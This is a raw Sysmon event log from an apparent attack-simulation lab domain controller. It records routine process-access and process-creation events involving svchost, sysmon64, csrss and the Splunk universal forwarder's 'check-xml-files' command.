08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16B6-5F84-5800-000000007F01}38803876C:\Windows\system32\cmd.exe{5D479F2C-16B6-5F84-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.096{5D479F2C-16B6-5F84-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5D479F2C-16B6-5F84-5800-000000007F01}3880C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-5800-000000007F01}3880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5800-000000007F01}3880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.089{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-5800-000000007F01}3880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.091{5D479F2C-16B6-5F84-5800-000000007F01}3880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program 